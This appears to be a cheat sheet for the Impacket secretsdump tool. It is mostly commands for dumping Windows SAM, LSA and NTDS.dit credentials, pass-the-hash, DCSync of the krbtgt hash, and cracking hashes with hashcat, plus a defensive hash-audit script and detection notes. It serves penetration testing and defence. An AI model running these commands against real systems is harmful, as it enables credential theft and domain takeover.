
Overview

impacket-secretsdump extracts credentials from Windows systems both remotely and locally. It can dump SAM hashes, LSA secrets, cached domain credentials, and the full NTDS.dit Active Directory database. It operates over SMB/RPC (ports 445/135) for remote targets, or parses registry hives and database files offline.
impacket-secretsdump <domain>/<user>:<password>@<target>

Authentication Methods

Password

impacket-secretsdump DOMAIN/user:password@<target>

NTLM Hash (Pass-the-Hash)

impacket-secretsdump DOMAIN/user@<target> -hashes LMhash:NThash

# Empty LM hash
impacket-secretsdump DOMAIN/user@<target> -hashes :NThash

# aad3b435b51404eeaad3b435b51404ee is the empty/disabled LM hash
impacket-secretsdump DOMAIN/user@<target> -hashes aad3b435b51404eeaad3b435b51404ee:NThash

Kerberos Ticket

# Using ccache from environment
export KRB5CCNAME=/tmp/krb5cc_admin
impacket-secretsdump DOMAIN/user@<target-hostname> -k -no-pass

# Requires valid TGT/TGS in the ccache
# Target must be a hostname (not IP) for Kerberos

AES Key

# AES key authentication uses Kerberos, so the target must be a hostname
impacket-secretsdump DOMAIN/user@<target-hostname> -aesKey <aes128-or-aes256-key>

Remote SAM Dump

Extracts local account NTLM hashes from the remote SAM database. Requires local administrator privileges on the target.
impacket-secretsdump DOMAIN/admin:password@<target>
Output format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Format: username:RID:LMhash:NThash:::

Remote LSA Secrets

Extracted automatically alongside SAM. Contains service account passwords, DPAPI machine keys, cached domain credentials, and auto-logon passwords.
impacket-secretsdump DOMAIN/admin:password@<target>
Output includes:
[*] Dumping LSA Secrets
$MACHINE.ACC:plain_password_hex:0123456789abcdef...
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:NThash
DPAPI_SYSTEM:dpapi_machinekey:0x1234... dpapi_userkey:0x5678...
NL$KM:hex_key

Cached Domain Credentials (DCC2)

LSA secrets include cached domain logons (stored as DCC2/mscachev2 hashes):
[*] Dumping cached domain logon information (domain/username:hash)
DOMAIN/jsmith:$DCC2$10240#jsmith#a8f2b4c...

Remote NTDS.dit Dump

Dumps the entire Active Directory database from a Domain Controller. Requires Domain Admin or equivalent privileges, specifically the replication rights (Replicating Directory Changes and Replicating Directory Changes All) that DRSUAPI checks.

DRSUAPI Method (Default — DCSync)

Uses the Directory Replication Service protocol to request secrets from the DC the way a replica partner would. It does not touch the DC's disk or create shadow copies, so it is stealthier than VSS, but it is not invisible: the DC logs the replication request (Event ID 4662 on the domain object with the replication control access rights), and a replication request from a host that is not a Domain Controller is a standard detection rule.
# Full domain dump
impacket-secretsdump DOMAIN/admin:password@<dc-hostname>

# Only NTLM hashes (skip Kerberos keys)
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc-ntlm

VSS Method (Volume Shadow Copy)

Creates a Volume Shadow Copy on the DC, copies NTDS.dit and SYSTEM hive, then parses them. Noisier — writes to disk, creates event logs.
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -use-vss

Output Flags for NTDS

Flag                 Effect
-just-dc             Only NTDS.dit (skip SAM/LSA)
-just-dc-ntlm        Only NTLM hashes from NTDS (no Kerberos keys)
-just-dc-user USER   Dump a single user from NTDS
-use-vss             Use Volume Shadow Copy instead of DRSUAPI
-history             Include password history hashes

Local SAM / SYSTEM / SECURITY Parsing

Parse registry hives offline without network access. Useful when you have copied hive files from a compromised machine.

Dump Hives on Target (if you have shell access)

reg save HKLM\SAM C:\sam.save
reg save HKLM\SYSTEM C:\system.save
reg save HKLM\SECURITY C:\security.save

Parse Locally

# SAM + SYSTEM (local account hashes)
impacket-secretsdump -sam sam.save -system system.save LOCAL

# SAM + SYSTEM + SECURITY (includes LSA secrets and cached creds)
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
The SYSTEM hive is always required — it contains the boot key needed to decrypt SAM and SECURITY.

Local NTDS.dit Parsing

Parse a copied NTDS.dit file offline. Requires the SYSTEM hive for decryption.
# Copy from DC (via shadow copy, backup, etc.)
# ntds.dit is at C:\Windows\NTDS\ntds.dit

impacket-secretsdump -ntds ntds.dit -system system.save LOCAL

# Only NTLM hashes
impacket-secretsdump -ntds ntds.dit -system system.save -just-dc-ntlm LOCAL

# Include history
impacket-secretsdump -ntds ntds.dit -system system.save -history LOCAL

Output Format

SAM Hashes (NTLM)

username:RID:LMhash:NThash:::
  • LMhash is aad3b435b51404eeaad3b435b51404ee when LM is disabled (modern Windows default)
  • NThash is the NTLM hash — this is what you crack or pass

NTDS.dit Hashes

domain\username:RID:LMhash:NThash:::
When using -just-dc (not -just-dc-ntlm), Kerberos keys are also dumped:
domain\username:aes256-cts-hmac-sha1-96:key
domain\username:aes128-cts-hmac-sha1-96:key
domain\username:des-cbc-md5:key

Cached Domain Credentials (DCC2 / mscachev2)

domain/username:$DCC2$10240#username#hash

LSA Secrets (Plaintext)

ServiceAccountName:plain_password_hex:hexdata

Extracting Specific Users

Dump a single account from NTDS.dit without pulling the entire database:
# Single user via DCSync
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc-user Administrator

# Machine account
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc-user 'DC01$'

# krbtgt (for Golden Ticket material)
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc-user krbtgt

History Hashes

Dump previous password hashes. Useful when the current hash is already known or when looking for password reuse patterns.
# Remote
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -history

# Local
impacket-secretsdump -ntds ntds.dit -system system.save -history LOCAL
Output appends _history0, _history1, etc.:
domain\user:RID:LMhash:NThash:::
domain\user_history0:RID:LMhash:NThash:::
domain\user_history1:RID:LMhash:NThash:::
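As an added example (not from the page or the Impacket project), a small Python audit that parses the SAM/NTDS line format above together with the _historyN lines and reports the password-hygiene problems a defender looks for in a dump of their own domain: blank passwords, LM hashes still stored, one password shared by several accounts, and a password recycled from history. The sample dump and its hash values are constructed.

```python
import re
from collections import defaultdict
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM disabled (the "empty LM hash")
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
# One SAM/NTDS hash line: [domain\]user[_historyN]:RID:LMhash:NThash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+?)(?:_history(?P<hist>\d+))?"
    r":(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample output (not a real dump); the hex values are made up
SAMPLE = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CORP\Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
CORP\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP\svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
CORP\jsmith:1105:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
CORP\jsmith_history0:1105:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
CORP\jsmith_history1:1105:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
CORP\legacy01:1106:112233445566778899aabbccddeeff00:deadbeefdeadbeefdeadbeefdeadbeef:::
CORP\jsmith:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""

def parse_dump(text):
    """Parse hash lines into dicts; [*] status lines and Kerberos key lines do not match and are skipped."""
    rows = [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]
    for row in rows:  # history index as int, None for the current password
        row["hist"] = int(row["hist"]) if row["hist"] is not None else None
    return rows

def audit(rows):
    """Return sorted (finding, subject) pairs for the hygiene problems described in the lead-in."""
    findings = []
    current = [r for r in rows if r["hist"] is None]
    by_nt = defaultdict(list)
    for r in current:
        if r["nt"] == EMPTY_NT:
            findings.append(("empty_password", r["user"]))
        if r["lm"] != EMPTY_LM:
            findings.append(("lm_hash_present", r["user"]))
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append(("shared_password", ",".join(sorted(users))))
    cur_nt = {r["user"]: r["nt"] for r in current}
    for r in rows:  # a history hash equal to the current hash means the password was recycled
        if r["hist"] is not None and cur_nt.get(r["user"]) == r["nt"]:
            findings.append(("password_recycled", f"{r['user']}:history{r['hist']}"))
    return sorted(findings)
```

Run `audit(parse_dump(open("dump.ntds").read()))` against the file produced by -outputfile to audit a real dump.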

Pass-the-Hash

Use an NTLM hash instead of a password for authentication:
# Standard pass-the-hash
impacket-secretsdump DOMAIN/user@<target> -hashes :NThash

# With full LM:NT pair
impacket-secretsdump DOMAIN/user@<target> -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889

# DCSync via pass-the-hash
impacket-secretsdump DOMAIN/user@<dc-hostname> -hashes :NThash -just-dc-user krbtgt

Kerberos Authentication

Use Kerberos tickets instead of passwords or hashes:
# Obtain TGT first (via impacket-getTGT, kinit, or Rubeus)
export KRB5CCNAME=/tmp/krb5cc_admin

# Use ticket — target MUST be hostname, not IP
impacket-secretsdump DOMAIN/user@<target-hostname> -k -no-pass

# DCSync with Kerberos
impacket-secretsdump DOMAIN/user@<dc-hostname> -k -no-pass -just-dc-user krbtgt

# With AES key directly
impacket-secretsdump DOMAIN/user@<target-hostname> -aesKey <aes256-key> -k
Ensure DNS resolves the DC hostname or add it to /etc/hosts. Kerberos does not work with IP addresses.

Common Use Cases

Post-Exploitation: Dump Local Hashes

# After compromising a workstation — get local admin hashes
impacket-secretsdump ./admin:password@<workstation>

DCSync: Extract Domain Hashes

# Full domain dump via DCSync
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc

# Just the krbtgt hash for Golden Ticket
impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -just-dc-user krbtgt

Offline Analysis: Hives from Disk Image

# Mount disk image, copy hives, parse offline
impacket-secretsdump -sam /mnt/Windows/System32/config/SAM \
  -system /mnt/Windows/System32/config/SYSTEM \
  -security /mnt/Windows/System32/config/SECURITY \
  LOCAL

Offline Analysis: NTDS.dit from Backup

impacket-secretsdump -ntds /mnt/backup/ntds.dit -system /mnt/backup/system.save LOCAL

Output to File

impacket-secretsdump DOMAIN/admin:password@<dc-hostname> -outputfile dump

# Creates: dump.sam, dump.secrets, dump.ntds, dump.ntds.kerberos, dump.ntds.cleartext

Cracking Extracted Hashes

NTLM Hashes (SAM / NTDS)

# Hashcat mode 1000
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John
john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cached Domain Credentials (DCC2 / mscachev2)

# Hashcat mode 2100 — very slow to crack
hashcat -m 2100 dcc2_hashes.txt /usr/share/wordlists/rockyou.txt

# John
john --format=mscash2 dcc2_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

LM Hashes (Legacy)

# Hashcat mode 3000
hashcat -m 3000 lm_hashes.txt /usr/share/wordlists/rockyou.txt

# John
john --format=LM lm_hashes.txt

Hash Type Summary

Hash Type          Hashcat Mode   John Format   Source
NTLM               1000           NT            SAM, NTDS.dit
LM                 3000           LM            SAM (legacy)
DCC2 / mscachev2   2100           mscash2       LSA cached creds
NetNTLMv2          5600           netntlmv2     Responder (not secretsdump)

Quick Reference — All Flags

Flag                  Description
-hashes LM:NT         Authenticate with NTLM hash
-k                    Use Kerberos authentication
-no-pass              No password (use with -k or -aesKey)
-aesKey KEY           Authenticate with AES key
-dc-ip IP             IP of the Domain Controller
-target-ip IP         IP of the target (if hostname differs)
-just-dc              Only extract NTDS.dit (skip SAM/LSA)
-just-dc-ntlm         Only NTLM hashes from NTDS
-just-dc-user USER    Extract single user from NTDS
-use-vss              Use Volume Shadow Copy method
-history              Include password history
-sam FILE             Local SAM hive file
-system FILE          Local SYSTEM hive file
-security FILE        Local SECURITY hive file
-ntds FILE            Local NTDS.dit file
-outputfile PREFIX    Write output to files with given prefix
-exec-method METHOD   Remote exec method: smbexec, wmiexec, mmcexec
-ts                   Add timestamp to output
-debug                Verbose debug output